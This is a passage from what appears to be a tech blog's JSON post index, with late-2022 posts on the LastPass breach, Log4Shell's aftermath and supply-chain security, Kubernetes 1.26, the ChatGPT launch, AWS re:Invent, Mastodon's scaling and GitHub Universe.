practically unbreakable, but that doesn\u0026rsquo;t matter if the system around it has exploitable paths.\nFor teams building cloud services, the lesson is clear: treat your development and staging environments with nearly the same rigor as production. 
The importance of comprehensive security responses to threats across all layers cannot be overstated. The attack surface isn\u0026rsquo;t just your front door — it\u0026rsquo;s every side entrance, back window, and connected garage. Assume that a breach of any environment could be a stepping stone to your most sensitive data, and architect accordingly.\nThis is going to be one of the defining security stories of 2022, and its ramifications will play out well into next year. Keep an eye on the technical post-mortems as they emerge — there will be valuable lessons for all of us building and operating cloud services.\n","date":"22 December 2022","externalUrl":null,"permalink":"/posts/221222-lastpass-breach-vault-data/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"LastPass reveals attackers obtained copies of customer vault data, turning an already serious breach into one of the worst password manager incidents in history.","title":"LastPass Breach Goes From Bad to Catastrophic — Customer Vaults Compromised","type":"posts"},{"content":"It\u0026rsquo;s been almost exactly one year since CVE-2021-44228 — better known as Log4Shell — turned the software industry upside down. On December 9, 2021, a critical remote code execution vulnerability in Apache Log4j 2, one of the most ubiquitous Java logging libraries in existence, sent every operations team scrambling. Entire weekends were consumed by frantic dependency scanning, emergency patching, and the uncomfortable realization that most organizations couldn\u0026rsquo;t even answer the basic question: \u0026ldquo;Do we use Log4j?\u0026rdquo;\nNow, a year later, it\u0026rsquo;s worth asking: what actually changed? Did the industry learn its lessons, or was Log4Shell just another crisis that generated momentary urgency before fading into background noise? 
The pattern emerged clearly with SolarWinds, Codecov, and subsequent incidents.\nThe State of Log4j Patching # Let\u0026rsquo;s start with the uncomfortable reality: Log4Shell isn\u0026rsquo;t fully remediated across the industry. According to data from Sonatype\u0026rsquo;s Maven Central repository statistics, a significant percentage of Log4j downloads are still for vulnerable versions. Some of this is build systems pulling cached artifacts, but some represents genuine continued use of unpatched versions.\nThe long tail of vulnerability remediation in open-source dependencies is a well-known problem, but Log4Shell made it visceral. Transitive dependencies — where your application doesn\u0026rsquo;t directly use Log4j but includes a library that includes a library that does — meant that many teams spent days just understanding their exposure. This pattern of hidden dependencies enabling attacks had already cost organizations significantly. Traditional vulnerability scanners that only check direct dependencies missed deeply nested transitive inclusions.\nThis experience directly accelerated adoption of Software Bills of Materials (SBOMs). The concept predates Log4Shell, but the crisis created the urgency. The U.S. Executive Order 14028 on cybersecurity, issued in May 2021, already mandated SBOMs for software sold to the federal government. Log4Shell provided the case study for why.\nThe SBOM Progress Report # Tools for generating and consuming SBOMs have proliferated over the past year. Syft from Anchore, Trivy from Aqua Security, and the SPDX and CycloneDX standards have all seen significant adoption growth. GitHub\u0026rsquo;s dependency graph and Dependabot, GitLab\u0026rsquo;s dependency scanning, and various CI/CD integrations now make it far easier to generate SBOMs as part of your build pipeline.\nBut generating an SBOM and actually using it for security operations are different things. 
Many organizations can now produce a JSON file listing their dependencies. Fewer have operationalized that data into workflows that automatically flag when a dependency in their SBOM has a new CVE, correlate that with deployment information to assess blast radius, and prioritize remediation based on actual exposure rather than CVSS scores alone.\nThe tooling is improving, but the operational maturity gap is real. We\u0026rsquo;ve solved the \u0026ldquo;generate the SBOM\u0026rdquo; problem; the \u0026ldquo;act on the SBOM effectively\u0026rdquo; problem remains open.\nSupply Chain Security Beyond SBOMs # Log4Shell also accelerated investment in broader supply chain security initiatives.\nSigstore, which reached general availability in October, provides free code signing for open-source projects. The idea is simple: if you can verify that a package was built from a specific source commit by a specific maintainer, you reduce the risk of tampering. Sigstore\u0026rsquo;s keyless signing approach, using short-lived certificates tied to OIDC identities, removes the historical barrier of key management that prevented widespread adoption of package signing.\nThe OpenSSF Scorecard project assigns security health metrics to open-source projects. It checks for things like branch protection, CI/CD pipeline security, dependency update practices, and signed releases. It\u0026rsquo;s becoming common to see Scorecard badges on GitHub repositories, and some organizations are starting to incorporate Scorecard data into their dependency approval processes.\nGoogle\u0026rsquo;s SLSA framework (Supply-chain Levels for Software Artifacts) provides a maturity model for supply chain security, from basic source and build provenance to hermetic, reproducible builds. 
Adoption is still early, but the framework gives organizations a vocabulary and roadmap for improving their supply chain security posture incrementally.\nWhat Hasn\u0026rsquo;t Changed Enough # Despite genuine progress, several fundamental problems remain.\nMaintainer sustainability is still precarious. Log4j is maintained by a small group of volunteers. The vulnerability response burned out already-stretched maintainers. Initiatives like the Alpha-Omega Project from the OpenSSF are directing funding to critical open-source projects, but the broader problem of funding the infrastructure everyone depends on remains unsolved. The OpenSSL vulnerability response showed both progress and the same underlying sustainability challenges.\nTransitive dependency management is still primitive in most ecosystems. JavaScript\u0026rsquo;s npm audit flags hundreds of advisories, most of which are in deep transitive dependencies that applications never actually invoke the vulnerable code path of. The noise-to-signal ratio discourages developers from engaging with the results, which is exactly the wrong outcome.\nVulnerability detection timing hasn\u0026rsquo;t fundamentally improved. Zero-day vulnerabilities in widely-used libraries still create fire drills. The time from vulnerability disclosure to widespread exploitation continues to shrink, while the time to patch — especially for organizations with complex deployment pipelines — hasn\u0026rsquo;t meaningfully decreased.\nMy Take # One year on, I\u0026rsquo;d give the industry a B-minus. Genuine progress has been made in tooling, standards, and awareness. SBOMs are becoming a real practice rather than a compliance checkbox. Sigstore and SLSA are building the infrastructure for verifiable supply chains. 
Organizations that couldn\u0026rsquo;t answer \u0026ldquo;do we use Log4j?\u0026rdquo; in December 2021 can now answer that question for most of their dependencies.\nBut the structural problems — underfunded maintainers, noisy vulnerability scanning, the economics of open-source security — are harder to solve than the tooling problems. We\u0026rsquo;ve built better smoke detectors. We haven\u0026rsquo;t addressed why buildings keep catching fire.\nIf your organization hasn\u0026rsquo;t adopted SBOM generation, dependency scanning in CI/CD, and a process for responding to critical dependency vulnerabilities, the anniversary of Log4Shell is a good moment to start. The lessons apply to the entire software supply chain from open-source components to deployed systems. The next Log4Shell is a matter of when, not if. The question is whether you\u0026rsquo;ll be scrambling again or prepared this time.\n","date":"15 December 2022","externalUrl":null,"permalink":"/posts/221215-log4shell-one-year-later/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"A year after Log4Shell shook the software industry, we examine what’s improved in supply chain security — and what still keeps us up at night.","title":"One Year After Log4Shell — What Actually Changed?","type":"posts"},{"content":"Kubernetes 1.26, codenamed \u0026ldquo;Electrifying,\u0026rdquo; dropped yesterday, and while it\u0026rsquo;s not the kind of release that generates breathless headlines, it\u0026rsquo;s packed with meaningful improvements for teams running production clusters. 
After three releases per year for several years now, the Kubernetes project has found a rhythm of steady, incremental progress — which is exactly what you want from infrastructure software.\nI\u0026rsquo;ve been running Kubernetes in production since the 1.9 days, and what strikes me about recent releases isn\u0026rsquo;t any single feature but the maturity of the project\u0026rsquo;s priorities: better defaults, improved stability, and cleaning up technical debt. Let\u0026rsquo;s look at what matters in 1.26.\nCEL for Admission Control: A Big Deal # The feature I\u0026rsquo;m most excited about is the arrival of Common Expression Language (CEL) for admission control as an alpha feature. As an alpha feature it is off by default and must be enabled through the ValidatingAdmissionPolicy feature gate. If you\u0026rsquo;ve managed Kubernetes at scale, you know that admission webhooks are simultaneously essential and operationally painful. Every mutating or validating webhook adds latency to the API server and introduces a dependency that can bring cluster operations to a halt if the webhook service is unavailable.\nCEL-based validation admission policies let you express validation rules directly in the API server without deploying external webhook services. This in-cluster validation pattern continues to evolve in later Kubernetes releases. Instead of running an OPA Gatekeeper pod or a custom webhook deployment, you can write validation logic as CEL expressions in a ValidatingAdmissionPolicy resource.\nFor example, enforcing that all Deployments have resource limits set, which previously required either a webhook or a policy engine, can now be expressed as a CEL expression evaluated in-process by the API server. No external dependencies, no extra network hop, no webhook availability concerns.\nThis doesn\u0026rsquo;t replace OPA or Kyverno for complex policy scenarios — CEL expressions are intentionally limited in scope. Container security practices continue to build on these foundational policy mechanisms. 
But for the 80% of admission policies that are straightforward validation checks, this is a meaningful simplification of the operational model.\nStorage Improvements # Kubernetes storage continues to mature with several notable changes in 1.26.\nCross-namespace volume data sources moves to alpha, allowing PersistentVolumeClaims to reference data sources in different namespaces. This addresses a real workflow limitation — for example, creating a development PVC from a production snapshot without copying the snapshot to the development namespace first.\nThe CSI driver migration project continues its march toward completion. In 1.26, the in-tree Azure Disk and Azure File drivers are marked for migration to their CSI equivalents. If you\u0026rsquo;re running on Azure, you should be planning your migration if you haven\u0026rsquo;t already. The in-tree storage drivers have been deprecated for a while, and each release moves closer to their removal.\nRetroactive default StorageClass assignment graduates to beta. Previously, if you created a PVC without specifying a StorageClass and no default was set, the PVC would remain unbound even after you later designated a default StorageClass. Now, the system retroactively assigns the default StorageClass to unbound PVCs. It\u0026rsquo;s a small quality-of-life improvement that eliminates a confusing failure mode.\nCleaning House: Removals and Deprecations # Every Kubernetes release removes deprecated features, and 1.26 has several notable ones.\nThe CRI v1alpha2 API is removed, meaning container runtimes must implement CRI v1. This shouldn\u0026rsquo;t affect anyone on recent versions of containerd or CRI-O, but if you\u0026rsquo;re running older runtime versions, this is your forcing function to upgrade.\nThe deprecated in-tree FlowSchema and PriorityLevelConfiguration API versions are removed. The dynamic kubelet configuration feature gate is removed entirely. 
And several beta APIs that have been superseded by GA equivalents are cleaned up.\nI appreciate this housekeeping, even though it sometimes causes upgrade friction. The Kubernetes platform maturity journey demonstrates how consistent cleanup enables long-term stability. A project the size of Kubernetes can\u0026rsquo;t afford to accumulate legacy APIs indefinitely. Every deprecated API that lingers is a maintenance burden and a source of confusion for newcomers trying to understand which approach is current.\nScheduling Enhancements # The scheduler sees some useful improvements. PodSchedulingReadiness arrives as an alpha feature, introducing a .spec.schedulingGates field that lets external controllers prevent pods from being scheduled until certain conditions are met. The use cases include batch scheduling systems that want to ensure all pods in a job can be placed before any of them start, or quota systems that need to approve resource consumption before scheduling proceeds.\nNodeInclusionPolicies for topology spread constraints give you finer control over which nodes are considered when calculating topology spread. You can now exclude tainted nodes from the spread calculation, which is a common request for clusters with mixed node types.\nUpgrade Considerations # If you\u0026rsquo;re planning your 1.26 upgrade, a few things to watch for:\nThe removal of several beta APIs means you should scan your manifests before upgrading, for example with the kubectl deprecations plugin (kubepug) or your cluster management tool\u0026rsquo;s equivalent. Manifests referencing removed APIs will fail to apply after the upgrade.\nThe CRI v1alpha2 removal means your container runtime must be reasonably current. Containerd 1.6+ and CRI-O 1.24+ implement CRI v1.\nAs always, test the upgrade in a staging environment first. 
The release notes are comprehensive and worth reading in full.\nMy Take # Kubernetes 1.26 is a \u0026ldquo;good infrastructure release\u0026rdquo; — it improves the platform\u0026rsquo;s operational characteristics without introducing unnecessary complexity. CEL-based admission policies alone justify attention, as they address one of the most common sources of cluster operational issues.\nThe project\u0026rsquo;s discipline around deprecation and removal is commendable. It\u0026rsquo;s tempting for open-source projects to keep deprecated features forever to avoid breaking users, but that path leads to unmaintainable software. The Kubernetes deprecation policy — clear timelines, multiple release warnings, and tooling to detect usage — is a model other projects should study.\nIf you\u0026rsquo;re running Kubernetes in production, plan your 1.26 upgrade for early next year. If you\u0026rsquo;re evaluating Kubernetes, the CEL admission policies and improved storage story make the operational model meaningfully more approachable than it was even a year ago.\n","date":"8 December 2022","externalUrl":null,"permalink":"/posts/221208-kubernetes-126-electrifying/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Kubernetes 1.26 ‘Electrifying’ arrives with significant improvements to storage, scheduling, and the ongoing effort to remove legacy code.","title":"Kubernetes 1.26 — Electrifying the Platform","type":"posts"},{"content":"Yesterday, OpenAI quietly released ChatGPT, a conversational AI model, and within hours my entire timeline — across every platform — was nothing but screenshots of people testing it. By this morning, it feels like every developer I know has tried it, and the reactions range from \u0026ldquo;this changes everything\u0026rdquo; to genuine existential dread.\nI spent a few hours with it last night, and I\u0026rsquo;ll be honest: it\u0026rsquo;s the most impressive AI demo I\u0026rsquo;ve ever interacted with. 
But I\u0026rsquo;ve been in this industry long enough to know that impressive demos and production-ready tools are very different things. Let\u0026rsquo;s dig into what\u0026rsquo;s actually happening here.\nWhat ChatGPT Actually Is # ChatGPT is built on GPT-3.5, fine-tuned using Reinforcement Learning from Human Feedback (RLHF). The key innovation isn\u0026rsquo;t the base model — GPT-3 has been available via API for over two years — but the conversational fine-tuning. Previous GPT-3 interactions required careful prompt engineering to get useful outputs. ChatGPT understands conversational context, follows instructions more reliably, and produces structured responses without elaborate prompting.\nThe RLHF approach is significant. Human trainers ranked model outputs by quality, and these rankings were used to train a reward model, which then guided further fine-tuning via proximal policy optimization. Later developments with Claude and context learning would build on these foundational techniques. The result is a model that\u0026rsquo;s better at following the intent behind a question rather than just pattern-matching on the words.\nFrom a technical perspective, this is an elegant demonstration of alignment techniques. The model actively refuses harmful requests, asks clarifying questions, and admits uncertainty. It\u0026rsquo;s not perfect at any of these — I\u0026rsquo;ve seen plenty of confident-sounding incorrect answers — but the improvement over raw GPT-3 is substantial.\nThe Coding Implications # As a developer, the coding capabilities are what caught my attention most. This would eventually evolve into dedicated AI coding assistants and Copilot agent mode. I tested it across several scenarios:\nExplaining code: I pasted in a complex regex and asked for an explanation. It broke it down component by component, accurately. I tried the same with a tricky SQL query involving window functions. 
Again, solid explanation.\nGenerating code: I asked for a Python function to parse a specific log format. The first output was functional and reasonably idiomatic. When I asked it to add error handling, it modified the code appropriately. When I pointed out an edge case it missed, it corrected it.\nDebugging: I pasted in a function with a subtle off-by-one error and asked it to find bugs. It identified the issue and explained why it was wrong.\nNone of this is magic — the model has been trained on vast amounts of code and programming discussion. But the conversational interface makes it dramatically more accessible than previous code-generation tools. You don\u0026rsquo;t need to craft perfect prompts; you can iterate naturally.\nWhere It Falls Down # The failure modes are important to understand. ChatGPT generates plausible-sounding text, but it has no mechanism for verifying factual accuracy. I asked it several questions about specific library APIs and got confidently stated answers that were subtly wrong — the function signatures looked right but had incorrect parameter names or return types.\nThis is the fundamental challenge with large language models for technical work: they optimize for coherence, not correctness. A senior developer will catch these errors. A junior developer might not. And that\u0026rsquo;s a real concern as these tools become more accessible.\nI also noticed the model struggles with temporal knowledge boundaries. It sometimes references features or versions that don\u0026rsquo;t exist yet, or conflates information from different time periods. The training data cutoff creates a knowledge horizon that the model doesn\u0026rsquo;t always respect gracefully.\nThe \u0026ldquo;What Happens to Stack Overflow\u0026rdquo; Question # The immediate reaction in many communities has been to question whether ChatGPT will replace Stack Overflow, developer documentation, or even developers themselves. 
Let me push back on the more dramatic predictions.\nStack Overflow\u0026rsquo;s value isn\u0026rsquo;t just answers — it\u0026rsquo;s verified, community-vetted, version-specific answers with context about why alternatives don\u0026rsquo;t work. The complementary roles of AI systems and human expertise continue to be refined. ChatGPT gives you an answer; Stack Overflow gives you an answer that a thousand developers have validated.\nThat said, for the initial \u0026ldquo;how do I approach this\u0026rdquo; phase of problem-solving, ChatGPT is remarkably effective. It\u0026rsquo;s like having a knowledgeable colleague available 24/7 who can get you 80% of the way there. The last 20% — verification, edge cases, production considerations — still requires human expertise.\nThe Infrastructure Question # One aspect that hasn\u0026rsquo;t gotten enough attention: the compute costs of running this at scale. Each conversation requires significant GPU resources for inference. OpenAI is currently offering this for free during a \u0026ldquo;research preview,\u0026rdquo; but the cost of serving millions of concurrent conversations with a model this size is non-trivial.\nThe economics of large language model inference are going to be a major infrastructure challenge going forward. This challenge shaped infrastructure decisions for AI workloads. Model serving at this scale requires specialized hardware, aggressive optimization (quantization, distillation, batching strategies), and potentially new architectural approaches.\nMy Take # ChatGPT is the most compelling AI product I\u0026rsquo;ve used. Full stop. The conversational interface, the quality of responses, and the breadth of capability represent a genuine step function in what\u0026rsquo;s accessible to developers and non-developers alike.\nBut I want to be measured here. 
I\u0026rsquo;ve seen enough hype cycles to know that the gap between \u0026ldquo;amazing demo\u0026rdquo; and \u0026ldquo;reliable production tool\u0026rdquo; is where most technologies stall. The question isn\u0026rsquo;t whether ChatGPT is impressive — it clearly is. The question is how quickly the rough edges get smoothed, how the economics work at scale, and whether the accuracy problems can be addressed.\nFor now, I\u0026rsquo;m treating it as a powerful drafting tool — great for generating first attempts, exploring approaches, and explaining unfamiliar code. But I\u0026rsquo;m verifying everything it produces, just as I would with code from any source I don\u0026rsquo;t fully trust.\nThe developer workflow is about to change. How much, and how fast, remains to be seen.\n","date":"1 December 2022","externalUrl":null,"permalink":"/posts/221201-chatgpt-changed-everything/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"OpenAI’s ChatGPT launches and immediately captivates the tech world with eerily capable conversational AI — but the real implications for developers run deeper than the hype.","title":"ChatGPT Just Changed Everything — Or Did It?","type":"posts"},{"content":"AWS re:Invent is underway in Las Vegas this week, and after attending virtually and following the keynotes closely, a clear theme is emerging: AWS is getting more opinionated. After years of offering low-level building blocks and letting customers figure out the architecture, Amazon is increasingly shipping higher-level, integrated services that encode best practices directly. This evolution continued through later AWS re:Invent announcements and 2025 innovation.\nThis is a significant shift for a company that has historically prided itself on offering primitives. 
And as someone who has been building on AWS since the S3-and-EC2 days, I have mixed feelings about it.\nThe Headline Announcements # The announcements are coming fast, as usual, but several stand out from an infrastructure perspective.\nAmazon EventBridge Pipes simplifies point-to-point integrations between event producers and consumers. Instead of writing Lambda glue code to move events between services, Pipes lets you declaratively connect sources to targets with optional filtering and transformation. It\u0026rsquo;s the kind of thing many teams have built custom scaffolding for, and having it as a managed service removes meaningful operational burden.\nAWS Application Composer is a visual tool for building serverless applications by dragging and dropping AWS resources on a canvas. It generates SAM/CloudFormation templates underneath. My first reaction was skepticism — visual infrastructure tools have a poor track record — but the tight integration with Infrastructure as Code underneath makes this more interesting than past attempts.\nAmazon CodeCatalyst is AWS\u0026rsquo;s entry into the unified DevOps platform space, combining project management, CI/CD, and development environments. It\u0026rsquo;s clearly a response to GitHub\u0026rsquo;s expansion beyond source control and GitLab\u0026rsquo;s integrated platform approach. Whether the market needs another DevOps platform is debatable, but AWS clearly thinks owning the developer workflow matters.\nThe Data Layer Moves # Perhaps more consequential than the developer tooling are the data-layer announcements. Amazon Aurora zero-ETL integration with Amazon Redshift is genuinely interesting — it enables near-real-time analytics on transactional data without building and maintaining ETL pipelines. 
If you\u0026rsquo;ve ever maintained a nightly ETL job that copies production data to a data warehouse, you understand why this matters.\nAmazon OpenSearch Serverless removes the need to provision and manage OpenSearch clusters. You pay for compute and storage consumption rather than instance hours. For teams running small-to-medium search workloads, this eliminates the classic problem of over-provisioning OpenSearch domains to handle peak load while paying for idle capacity during quiet periods.\nThe pattern across these announcements is consistent: take something that requires expertise and operational effort, and collapse it into a managed service with sane defaults. This aligns with broader platform engineering maturity trends.\nThe Graviton3E and Custom Silicon Story # AWS continues to push its custom silicon strategy. The Graviton3E instances (C7gn) optimized for networking-intensive workloads and the continued expansion of Graviton3 availability across instance families reinforce that ARM-based compute is no longer experimental on AWS — it\u0026rsquo;s the recommended default for many workloads.\nI\u0026rsquo;ve been running production workloads on Graviton2 instances for over a year now, and the price-performance advantage is real. Graviton3 extends that lead. The ecosystem compatibility story has also improved dramatically — most Docker images now publish multi-arch manifests, and the major language runtimes all have solid ARM64 support.\nThe custom silicon narrative extends beyond compute with AWS Inferentia2 chips for ML inference workloads, promising significant cost savings over GPU-based inference. NVIDIA\u0026rsquo;s competitive response shows how intense this space has become. 
As ML model serving becomes a bigger part of cloud spend, purpose-built inference hardware could meaningfully change the economics.\nWhat\u0026rsquo;s Missing: Cost Transparency # For all the impressive announcements, one area where AWS continues to underdeliver is cost predictability. New serverless and consumption-based services are great for eliminating idle costs, but they also make it harder to predict monthly bills. OpenSearch Serverless, for example, charges in \u0026ldquo;OCUs\u0026rdquo; (OpenSearch Compute Units) — a new unit that teams will need to build intuition around.\nI keep waiting for a re:Invent where cost management is a headline theme rather than an afterthought. AWS Cost Explorer and the recent Cost Anomaly Detection improvements help, but the fundamental challenge of understanding what you\u0026rsquo;ll pay before you get the bill remains unsolved. Third-party tools like Vantage, Infracost, and the open-source OpenCost project are filling this gap, which tells you something about the state of native tooling.\nMy Take # Re:Invent always generates a wave of \u0026ldquo;look at everything new\u0026rdquo; excitement, and this year is no different. But the underlying trend — AWS moving up the stack toward more opinionated, integrated solutions — is the real story. It\u0026rsquo;s a tacit acknowledgment that many customers don\u0026rsquo;t want building blocks; they want solutions. The cloud consolidation story continues to shape infrastructure choices.\nThis is good for teams that are happy within the AWS ecosystem. Zero-ETL from Aurora to Redshift genuinely removes painful infrastructure work. EventBridge Pipes eliminates boilerplate. Application Composer could help teams visualize their serverless architectures.\nBut it also deepens lock-in. Each opinionated service that replaces a general-purpose pattern (say, a Lambda function moving data between queues) is harder to replicate on another cloud. 
That\u0026rsquo;s the trade-off, and it\u0026rsquo;s one every architecture team needs to evaluate consciously rather than sleepwalking into.\nThe cloud is maturing, and mature platforms get opinionated. That\u0026rsquo;s not inherently good or bad — it\u0026rsquo;s a phase of the technology lifecycle. The key is being deliberate about which opinions you adopt.\n","date":"24 November 2022","externalUrl":null,"permalink":"/posts/221124-aws-reinvent-2022-cloud-opinionated/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"AWS re:Invent 2022 kicks off with a clear message: the cloud giant is moving beyond primitives and toward opinionated, integrated solutions.","title":"AWS re:Invent 2022 — The Cloud Gets Opinionated","type":"posts"},{"content":"If you\u0026rsquo;ve been anywhere near tech circles this past week, you\u0026rsquo;ve heard the word \u0026ldquo;Mastodon\u0026rdquo; more times than in the previous six years combined. The mass exodus from Twitter — fueled by layoffs, policy chaos, and general uncertainty under new ownership — has sent millions of users scrambling for alternatives. And Mastodon, the open-source, decentralized microblogging platform built on the ActivityPub protocol, is the primary beneficiary.\nMastodon has reportedly gained over 2 million new users in just the past two weeks. For a project that was largely dismissed as a niche curiosity since its launch in 2016, this is a defining moment. But as someone who has watched many \u0026ldquo;this will replace X\u0026rdquo; movements come and go, I\u0026rsquo;m more interested in what\u0026rsquo;s happening under the hood than in the migration numbers themselves.\nActivityPub: The Protocol That Could # What makes Mastodon genuinely interesting from an engineering perspective isn\u0026rsquo;t the Rails application itself — it\u0026rsquo;s ActivityPub, the W3C standard that powers federation between instances. 
Unlike centralized platforms where a single company controls the infrastructure, Mastodon operates as a network of independently hosted servers (instances) that communicate through a shared protocol.\nThis is conceptually similar to email: you can run your own mail server, use Gmail, or choose any provider, and they all interoperate. ActivityPub extends this model to social interactions — follows, posts, boosts, and replies all flow between instances via standardized JSON-LD payloads over HTTPS.\nThe elegance is real, but so are the challenges. Federation means that a popular post doesn\u0026rsquo;t just live on one server — it gets replicated across potentially thousands of instances. Each boost, each reply, generates federation traffic. The protocol wasn\u0026rsquo;t designed with the assumption that millions of users would arrive in a two-week window.\nThe Scalability Reality Check # Instance administrators are learning hard lessons right now. The flagship mastodon.social instance, run by Mastodon\u0026rsquo;s creator Eugen Rochko, has been struggling with load. Sidekiq queues — Mastodon uses Sidekiq for background job processing — have been backing up significantly. Federation delivery, media processing, and notification dispatch all compete for worker threads.\nI\u0026rsquo;ve been poking around the Mastodon GitHub repository and the issues being filed are exactly what you\u0026rsquo;d expect from a sudden 10x traffic spike: database connection pool exhaustion, Redis memory pressure, and Elasticsearch indexing falling behind. The architecture is solid Ruby on Rails with PostgreSQL, Redis, and optional Elasticsearch — a well-understood stack, but one that requires careful tuning at scale.\nWhat\u0026rsquo;s particularly challenging is that smaller instances, often run by volunteers on modest VPS plans, are hit hardest. 
A small instance with 500 users that suddenly gains 5,000 new accounts faces not just more local load but a disproportionate jump in federation traffic, because each new user follows accounts spread across many other instances.\nThe Self-Hosting Question # This situation highlights something I\u0026rsquo;ve been thinking about for years: the gap between \u0026ldquo;you can self-host this\u0026rdquo; and \u0026ldquo;you should self-host this.\u0026rdquo; Running a Mastodon instance requires PostgreSQL administration, Redis management, media storage (S3 or local), SMTP configuration, and ongoing security updates. It\u0026rsquo;s not trivial.\nDocker Compose makes initial deployment straightforward, but operational excellence requires monitoring, backup strategies, and capacity planning. I\u0026rsquo;ve seen several new instance admins discovering that object storage costs for federated media can surprise you quickly — every image and video that your users\u0026rsquo; timelines pull in gets cached locally by default.\nThe positive side is that this is forcing the community to produce better operational documentation. Guides for running Mastodon behind Cloudflare, tuning PgBouncer connection pooling, and configuring S3-compatible storage are proliferating. The Mastodon documentation itself has seen a flurry of contributions.\nWhat This Means for Decentralized Software # Beyond Mastodon specifically, this moment matters for the broader decentralized web movement. ActivityPub isn\u0026rsquo;t just for microblogging — projects like PeerTube (video), Pixelfed (photos), and Lemmy (link aggregation) all implement the protocol. A user on Mastodon can theoretically follow and interact with a PeerTube channel. This interoperability is the real promise.\nThe stress test also reveals where the protocol needs work. Discovery is poor compared to centralized platforms — finding people across instances requires knowing their full handle or stumbling upon them through boosts. 
Content moderation is instance-level, which is both a feature and a challenge. There\u0026rsquo;s no global search across the fediverse by design, which protects privacy but frustrates newcomers.\nMy Take # I\u0026rsquo;ve run a small ActivityPub-compatible instance for testing purposes, and I can tell you: the technology works, but the operational burden is real. What excites me about this moment isn\u0026rsquo;t necessarily that Mastodon will \u0026ldquo;win\u0026rdquo; against Twitter — I\u0026rsquo;m skeptical of that framing. What excites me is that millions of people are experiencing, for the first time, what it means to use software that no single entity controls.\nWhether the retention numbers hold up remains to be seen. But the contributions flowing into the Mastodon codebase, the improvements to federation performance, and the increased awareness of protocols like ActivityPub — these have lasting value regardless of what happens with Twitter. Open protocols tend to compound in value over time, even when individual implementations rise and fall.\nThe fediverse just got its biggest real-world stress test. And honestly? It\u0026rsquo;s holding up better than I expected.\n","date":"17 November 2022","externalUrl":null,"permalink":"/posts/221117-mastodon-fediverse-stress-test/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"As millions flee Twitter for Mastodon, the decentralized social protocol ActivityPub faces its biggest real-world scalability challenge yet.","title":"Mastodon's Moment — The Fediverse Gets Its Stress Test","type":"posts"},{"content":"GitHub Universe 2022 wrapped up yesterday, and the message was clear: AI-assisted development isn\u0026rsquo;t a future vision — it\u0026rsquo;s the product strategy. 
The conference delivered a slate of announcements that range from genuinely useful to thought-provoking, all centered around the idea that developer productivity is the key metric GitHub is optimizing for.\nCopilot for Business: Enterprise AI Arrives # The biggest announcement is GitHub Copilot for Business, which makes the AI pair programmer available with enterprise-grade features: organization-wide policy management, centralized billing, and — critically — a proxy server option that routes through your organization\u0026rsquo;s network.\nThe individual version of Copilot has been available since June, and I\u0026rsquo;ve been using it daily. My experience has been mixed but trending positive. For boilerplate code, test scaffolding, and common patterns, it\u0026rsquo;s remarkably good. It saves me real time on tasks I\u0026rsquo;d otherwise spend five minutes writing by hand. For complex logic or domain-specific code, it\u0026rsquo;s less reliable but still useful as a starting point.\nThe Business tier adds features that enterprises actually need. The organization-wide policy controls let administrators enable or disable Copilot across teams, block suggestions that match public code (addressing the copyright concerns), and manage licenses centrally. The VPN-compatible proxy option addresses the data sovereignty concerns that kept many regulated industries from adopting the individual version.\nI expect adoption to accelerate now. The objections I\u0026rsquo;ve heard from engineering managers have consistently been about policy control and licensing, not about the technology itself. This release removes those barriers. Later evolution of Copilot would expand its capabilities significantly.\nHey, GitHub! — Voice Coding # The more experimental announcement was \u0026ldquo;Hey, GitHub!\u0026rdquo;, a voice-controlled coding interface. 
Currently in technical preview, it lets developers write and edit code using natural language voice commands.\nI\u0026rsquo;m less convinced about this one. Voice coding has been attempted before — tools like Talon and Serenade have served the accessibility community well — but mainstream adoption has been limited. The demo showed writing Python functions by describing them verbally, which is impressive, but the real challenge is editing existing code, navigating large codebases, and handling the back-and-forth of iterative development. AI-assisted coding would eventually mature beyond voice input.\nWhere I see genuine value is in accessibility. Developers with repetitive strain injuries or other conditions that limit keyboard use deserve first-class tools, and GitHub investing in this space is positive regardless of whether it becomes a mainstream workflow.\nCodespaces for Free Tier # GitHub is making Codespaces available to all users, including free-tier accounts, with 60 hours per month of 2-core usage and 15 GB of storage included. This is a significant democratization move.\nI\u0026rsquo;ve been using Codespaces for several open-source projects, and the onboarding improvement is dramatic. A new contributor can go from \u0026ldquo;I want to help\u0026rdquo; to \u0026ldquo;I have a running development environment\u0026rdquo; in under two minutes. No local setup, no dependency conflicts, no \u0026ldquo;works on my machine\u0026rdquo; issues.\nFor open-source maintainers, this is arguably more impactful than Copilot. The biggest barrier to open-source contribution isn\u0026rsquo;t writing code — it\u0026rsquo;s setting up the development environment. DevContainers and Codespaces effectively eliminate that barrier. I\u0026rsquo;ve already added devcontainer.json files to several of my repositories, and the increase in drive-by contributions has been noticeable.\nGitHub Actions Improvements # The Actions announcements were less flashy but practically important. 
Required workflows let organization admins enforce that specific workflows run on every repository — think security scanning, compliance checks, or standardized testing. Reusable workflows improvements now support calling workflows from private repositories, which makes it practical to maintain internal workflow libraries.\nRequired workflows, in particular, solve a governance problem I\u0026rsquo;ve fought with for years. When you have hundreds of repositories in an organization, ensuring that every one runs your security scanning pipeline is a constant battle. Some teams forget, some teams remove it, some teams never added it. Being able to enforce it at the organization level is exactly right.\nThe Broader AI Strategy # Stepping back from individual announcements, what\u0026rsquo;s striking about Universe this year is how comprehensively GitHub is integrating AI. Copilot writes code. Copilot Labs explains and translates code. The upcoming code review features use AI to suggest improvements. The security scanning uses AI to detect vulnerabilities.\nGitHub is building toward a future where AI is involved in every stage of the development lifecycle — writing, reviewing, testing, deploying, and monitoring. Testing acceleration with AI shows how deep this integration runs. Whether that\u0026rsquo;s exciting or concerning depends on your perspective.\nI lean toward cautiously excited. The tools I\u0026rsquo;ve used — Copilot primarily — have made me more productive without making me less thoughtful about code quality. The developer experience evolution continues to push these boundaries forward. The key is that these are assistive tools, not autonomous ones. I still make every architectural decision, I still review every suggestion, and I still write the critical logic myself. 
